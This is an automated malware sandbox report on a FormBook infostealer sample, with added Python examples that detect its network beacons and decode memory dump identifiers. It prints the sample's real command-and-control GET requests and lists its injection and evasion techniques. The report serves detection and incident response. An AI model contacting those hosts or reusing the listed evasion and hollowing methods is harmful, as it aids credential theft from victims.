Analysis Report kayx.exe

Overview

General Information

Sample Name: kayx.exe
Analysis ID: 321226
MD5: a80e73a824b655491f54278b7a29467d
SHA1: f33ddffc223c9afa4e226d3567b990a8e44828e6
SHA256: bdcd13abdded8f4f709fb288fb78b4afff486854b3ea78ad378d11220a31c3c4
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: kayx.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Avira: detection malicious, Label: TR/Dropper.MSIL.blecg
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe ReversingLabs: Detection: 45%
Multi AV Scanner detection for submitted file
Source: kayx.exe Virustotal: Detection: 34%
Source: kayx.exe ReversingLabs: Detection: 45%
Yara detected FormBook
Source: Yara match File source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: kayx.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 17.2.kayx.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.1.kayx.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\kayx.exe Code function: 4x nop then pop edi 17_2_0040C122
Source: C:\Users\user\Desktop\kayx.exe Code function: 4x nop then pop edi 17_1_0040C122

Networking:

HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /bg8v/?dR-0T=Hsg8WmNsaLMOQIlEIMfuFbk4MqbSZJWeSLNd01xx1olwbrd2uyfvFyB8JS14b3uA3WpV&Fxl0dR=KdShEXiX HTTP/1.1 | Host: www.ghoster.agency | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX HTTP/1.1 | Host: www.jibenentreprenad.mobi | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 184.168.131.241
Source: Joe Sandbox View IP Address: 184.168.131.241
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: global traffic HTTP traffic detected: GET /bg8v/?dR-0T=Hsg8WmNsaLMOQIlEIMfuFbk4MqbSZJWeSLNd01xx1olwbrd2uyfvFyB8JS14b3uA3WpV&Fxl0dR=KdShEXiX HTTP/1.1 | Host: www.ghoster.agency | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX HTTP/1.1 | Host: www.jibenentreprenad.mobi | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: unknown DNS traffic detected: queries for: www.ghoster.agency
Source: explorer.exe, 00000012.00000000.377196648.000000000F640000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000012.00000000.377196648.000000000F640000.00000004.00000001.sdmp String found in binary or memory: http://crl.v
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: mstsc.exe, 00000015.00000002.487573696.000000000543D000.00000004.00000001.sdmp String found in binary or memory: https://www.jiben.se/bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb
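The two GET requests above share one shape: a short single-segment path (/bg8v/), a query with exactly two parameters (a long encoded blob and a short fixed tag, KdShEXiX on both hosts), Connection: close, and no User-Agent header. The following is an added example, not part of the Joe Sandbox report, that turns that shape into a request-level heuristic and runs it over the two requests from this report plus one constructed benign request. The CRLF header separators were re-inserted by hand (the report prints the requests flattened), the regex thresholds and the benign request are this example's own choices, and it is a triage heuristic rather than a definitive FormBook signature.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# The first two requests are the beacons printed in this report's Networking
# section, with CRLF separators re-inserted by hand; the third is a constructed
# benign control that does not come from the report.
SAMPLE_REQUESTS = [
    "GET /bg8v/?dR-0T=Hsg8WmNsaLMOQIlEIMfuFbk4MqbSZJWeSLNd01xx1olwbrd2uyfvFyB8JS14b3uA3WpV"
    "&Fxl0dR=KdShEXiX HTTP/1.1\r\nHost: www.ghoster.agency\r\nConnection: close\r\n\r\n",
    "GET /bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1"
    "&Fxl0dR=KdShEXiX HTTP/1.1\r\nHost: www.jibenentreprenad.mobi\r\nConnection: close\r\n\r\n",
    "GET /index.html?lang=en HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\nConnection: close\r\n\r\n",
]

# Thresholds below are this example's own choices, not values from the report.
SHORT_PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,8}/$")       # e.g. /bg8v/
ENCODED_BLOB_RE = re.compile(r"^[A-Za-z0-9+/_=-]{32,}$")  # long base64-like value


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into method, path, query pairs, headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    return {
        "method": method,
        "path": url.path,
        "query": parse_qsl(url.query, keep_blank_values=True),
        "headers": headers,
        "body": body,
    }


def formbook_indicators(req: dict) -> list:
    """Return the FormBook-style traits present in one parsed request."""
    reasons = []
    if req["method"] in ("GET", "POST") and "user-agent" not in req["headers"]:
        reasons.append("no User-Agent header")
    if SHORT_PATH_RE.match(req["path"]):
        reasons.append("short single-segment path")
    query = req["query"]
    if (len(query) == 2 and ENCODED_BLOB_RE.match(query[0][1])
            and 4 <= len(query[1][1]) <= 16):
        reasons.append("two-parameter query: long encoded blob plus short tag")
    return reasons


def is_suspected_beacon(raw: str) -> bool:
    """Flag only when the missing User-Agent coincides with both URI traits,
    so that every UA-less client on the network is not reported."""
    return len(formbook_indicators(parse_request(raw))) == 3


def scan(requests) -> list:
    """Return (host, path, reasons) for each request that trips the heuristic."""
    hits = []
    for raw in requests:
        req = parse_request(raw)
        reasons = formbook_indicators(req)
        if len(reasons) == 3:
            hits.append((req["headers"].get("host", ""), req["path"], reasons))
    return hits


if __name__ == "__main__":
    for host, path, reasons in scan(SAMPLE_REQUESTS):
        print(f"{host}{path}: {'; '.join(reasons)}")
```

Both report requests trip all three traits; the constructed control trips none. The hostnames themselves are deliberately not part of the heuristic: FormBook rotates through a list of candidate domains, so the URI structure and the missing User-Agent are the stable part of the beacon, and the hosts in this report (and the www.jiben.se URL found in mstsc.exe memory) should be handled as indicators to block and hunt for, not as the detection logic.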

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: firefoxe.exe, 00000013.00000002.483426018.000000000108B000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
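The Yara matches above are reported against memory dump identifiers rather than files, and the identifier encodes where each hit sits. The following is an added example, not part of the Joe Sandbox report, that decodes those identifiers so the hits can be triaged by process and page protection. The field layout (process index, run, dump id, base address, protection, flags) is inferred from cross-references inside this report: dump 00000011.00000002...0000000000400000 corresponds to 17.2.kayx.exe.400000, and the report names process 00000015 as mstsc.exe, 00000012 as explorer.exe and 00000013 as firefoxe.exe. The protection field is interpreted as the documented Windows PAGE_* constants; the meaning of the final flags field is not known from the report and is kept as a raw value.

```python
from dataclasses import dataclass

# Process index -> image name, taken from cross-references in this report
# (e.g. "mstsc.exe, 00000015..." and "17.2.kayx.exe.400000.0.unpack").
PROCESS_NAMES = {1: "kayx.exe", 15: "kayx.exe", 16: "kayx.exe", 17: "kayx.exe",
                 18: "explorer.exe", 19: "firefoxe.exe", 21: "mstsc.exe"}

# Documented Windows memory protection constants.
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}

# The memory dumps the FormBook Yara rules matched, copied from this report.
YARA_HITS = [
    "00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp",
    "00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp",
    "00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp",
    "00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp",
    "00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp",
    "00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp",
    "00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp",
]


@dataclass
class DumpInfo:
    process_index: int
    process_name: str
    run: int
    base: int
    protection: int
    protection_name: str
    flags: int  # last field; meaning not established from the report, kept raw


def parse_dump_id(name: str) -> DumpInfo:
    """Decode an .sdmp identifier. Field layout is an assumption inferred from
    the report's own cross-references (see lead-in), not a documented format."""
    stem = name[:-5] if name.endswith(".sdmp") else name
    fields = stem.split(".")
    if len(fields) != 6:
        raise ValueError(f"unexpected dump identifier: {name}")
    proc, run, _dump_id, base, prot, flags = fields
    proc_i, prot_i = int(proc, 16), int(prot, 16)
    return DumpInfo(
        process_index=proc_i,
        process_name=PROCESS_NAMES.get(proc_i, "?"),
        run=int(run, 16),
        base=int(base, 16),
        protection=prot_i,
        protection_name=PAGE_PROTECTIONS.get(prot_i & 0xFF, f"0x{prot_i:x}"),
        flags=int(flags, 16),
    )


def executable_hits(names) -> list:
    """Return decoded dumps whose page protection includes execute: a payload
    Yara-matched in RWX memory is the injected/unpacked code, not just data."""
    return [info for info in map(parse_dump_id, names)
            if info.protection & 0xFF in EXECUTABLE]


def summarize(names) -> dict:
    """Count hits per (process index, process name, protection) for triage."""
    summary = {}
    for info in map(parse_dump_id, names):
        key = (info.process_index, info.process_name, info.protection_name)
        summary[key] = summary.get(key, 0) + 1
    return summary


if __name__ == "__main__":
    for key, count in sorted(summarize(YARA_HITS).items()):
        print(f"process {key[0]:>2} ({key[1]:<12}) {key[2]:<24} {count} hit(s)")
    for info in executable_hits(YARA_HITS):
        print(f"  RWX payload at 0x{info.base:08X} in {info.process_name} run {info.run}")
```

Decoding the seven hits this way shows five of them in PAGE_EXECUTE_READWRITE memory, four of those in process 17 (kayx.exe) and one in process 21 (mstsc.exe), which matches the "Sample uses process hollowing technique" and "Injects a PE file into a foreign processes" signatures: a legitimately loaded image does not normally have its code at 0x400000 mapped writable and executable. The two PAGE_READWRITE hits (process 1 at 0x41E1000 and process 21 at 0xA00000) are the kind of location where a decrypted-but-not-yet-mapped payload or its configuration sits, and are the better place to start when carving the FormBook configuration from the dumps.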

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\Desktop\kayx.exe Code function: 1_2_05C4AAF0 NtUnmapViewOfSection, 1_2_05C4AAF0
Source: C:\Users\user\Desktop\kayx.exe Code function: 1_2_05C4AAE8 NtUnmapViewOfSection, 1_2_05C4AAE8
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00417B90 NtCreateFile, 17_2_00417B90
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00417C40 NtReadFile, 17_2_00417C40
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00417CC0 NtClose, 17_2_00417CC0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00417D70 NtAllocateVirtualMemory, 17_2_00417D70
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00417B4A NtCreateFile, 17_2_00417B4A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00417BE2 NtCreateFile, 17_2_00417BE2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00417B8A NtCreateFile, 17_2_00417B8A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00417CBF NtClose, 17_2_00417CBF
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E498F0 NtReadVirtualMemory,LdrInitializeThunk, 17_2_00E498F0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49860 NtQuerySystemInformation,LdrInitializeThunk, 17_2_00E49860
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49840 NtDelayExecution,LdrInitializeThunk, 17_2_00E49840
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E499A0 NtCreateSection,LdrInitializeThunk, 17_2_00E499A0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49910 NtAdjustPrivilegesToken,LdrInitializeThunk, 17_2_00E49910
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49A50 NtCreateFile,LdrInitializeThunk, 17_2_00E49A50
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49A20 NtResumeThread,LdrInitializeThunk, 17_2_00E49A20
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49A00 NtProtectVirtualMemory,LdrInitializeThunk, 17_2_00E49A00
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E495D0 NtClose,LdrInitializeThunk, 17_2_00E495D0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49540 NtReadFile,LdrInitializeThunk, 17_2_00E49540
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E496E0 NtFreeVirtualMemory,LdrInitializeThunk, 17_2_00E496E0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49660 NtAllocateVirtualMemory,LdrInitializeThunk, 17_2_00E49660
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49FE0 NtCreateMutant,LdrInitializeThunk, 17_2_00E49FE0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E497A0 NtUnmapViewOfSection,LdrInitializeThunk, 17_2_00E497A0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49780 NtMapViewOfSection,LdrInitializeThunk, 17_2_00E49780
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49710 NtQueryInformationToken,LdrInitializeThunk, 17_2_00E49710
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E498A0 NtWriteVirtualMemory, 17_2_00E498A0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E4B040 NtSuspendThread, 17_2_00E4B040
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49820 NtEnumerateKey, 17_2_00E49820
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E499D0 NtCreateProcessEx, 17_2_00E499D0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49950 NtQueueApcThread, 17_2_00E49950
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49A80 NtOpenDirectoryObject, 17_2_00E49A80
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49A10 NtQuerySection, 17_2_00E49A10
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E4A3B0 NtGetContextThread, 17_2_00E4A3B0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49B00 NtSetValueKey, 17_2_00E49B00
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E495F0 NtQueryInformationFile, 17_2_00E495F0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49560 NtWriteFile, 17_2_00E49560
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49520 NtWaitForSingleObject, 17_2_00E49520
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E4AD30 NtSetContextThread, 17_2_00E4AD30
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E496D0 NtCreateKey, 17_2_00E496D0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49670 NtQueryInformationProcess, 17_2_00E49670
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49650 NtQueryValueKey, 17_2_00E49650
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49610 NtEnumerateValueKey, 17_2_00E49610
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49760 NtOpenProcess, 17_2_00E49760
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49770 NtSetInformationFile, 17_2_00E49770
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E4A770 NtOpenThread, 17_2_00E4A770
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E49730 NtQueryVirtualMemory, 17_2_00E49730
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E4A710 NtOpenProcessToken, 17_2_00E4A710
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00417B90 NtCreateFile, 17_1_00417B90
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00417C40 NtReadFile, 17_1_00417C40
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00417CC0 NtClose, 17_1_00417CC0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_1_00417D70 NtAllocateVirtualMemory, 17_1_00417D70
